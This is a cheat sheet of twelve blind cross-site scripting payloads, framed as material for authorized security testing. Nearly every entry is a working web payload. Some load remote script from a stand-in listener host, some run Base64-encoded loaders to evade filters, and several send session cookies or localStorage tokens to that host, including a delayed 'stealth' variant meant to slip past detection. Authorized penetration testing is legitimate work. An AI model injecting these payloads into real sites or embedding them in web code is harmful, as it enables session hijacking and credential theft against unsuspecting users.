# Blind XSS Payloads

⚠️ For educational and authorized testing only.
Replace "your-listener-domain" with your controlled endpoint (e.g., a lab listener).

----------------------------------------
1. External Script Load
Payload: <script src=//your-listener-domain></script>
Description: Loads external JS from your server.
Use Case: Detects blind XSS when code executes later (no immediate UI feedback).

----------------------------------------
2. Attribute Break + Script
Payload: "><script src=//your-listener-domain></script>
Description: Breaks out of an HTML attribute and injects a script tag.
Use Case: Common in inputs rendered inside attributes (e.g., value="...").

----------------------------------------
3. JavaScript URI Injection
Payload: javascript:eval('var a=document.createElement(\'script\');a.src=\'//your-listener-domain\';document.body.appendChild(a)')
Description: Dynamically creates and appends a script element.
Use Case: Works where javascript: URLs are accepted (links, some redirects).

----------------------------------------
4. Encoded Loader via Image Error
Payload: <img src=x onerror=eval(atob('BASE64_CODE'))>
Description: Executes a Base64-encoded loader on error.
Use Case: Bypasses simple keyword filters (alert, script).

----------------------------------------
5. Encoded Loader via SVG
Payload: <svg/onload=eval(atob('BASE64_CODE'))>
Description: Runs encoded loader inside SVG context.
Use Case: Bypass filters that allow SVG but block <script>.

----------------------------------------
6. Cookie Exfiltration (Proof of Impact)
Payload:
<script>
var i=new Image;
i.src="http://your-listener-domain/?"+document.cookie;
</script>
Description: Sends cookies to your endpoint.
Use Case: Demonstrates real impact (session data exposure) in a lab.

----------------------------------------
7. Fetch API Exfiltration
Payload:
<script>
fetch("http://your-listener-domain/?c="+document.cookie)
</script>
Description: Sends data using Fetch API.
Use Case: Modern alternative to image-based exfiltration.

----------------------------------------
8. Image Object Exfiltration (Compact)
Payload:
<script>new Image().src="http://your-listener-domain/?c="+document.cookie;</script>
Description: One-line data exfiltration.
Use Case: Cleaner and commonly used in real attacks.

----------------------------------------
9. DOM Storage Access
Payload:
<script>
var data=localStorage.getItem("token");
new Image().src="http://your-listener-domain/?d="+data;
</script>
Description: Extracts data from localStorage.
Use Case: Targets apps storing tokens client-side.

----------------------------------------
10. Delayed Execution (Stealth)
Payload:
<script>
setTimeout(function(){
new Image().src="http://your-listener-domain";
},3000);
</script>
Description: Executes after delay.
Use Case: Bypass timing-based detection systems.

----------------------------------------
11. Iframe Injection
Payload:
<iframe src="javascript:var s=document.createElement('script');s.src='//your-listener-domain';document.body.appendChild(s);"></iframe>
Description: Injects script via iframe.
Use Case: Useful when direct script injection is filtered.

----------------------------------------
12. Form Auto-Submit Exfiltration
Payload:
<form action="http://your-listener-domain" method="POST">
<input name="data" value="test">
</form>
<script>document.forms[0].submit()</script>
Description: Sends data via POST request.
Use Case: Bypass restrictions on GET requests.

----------------------------------------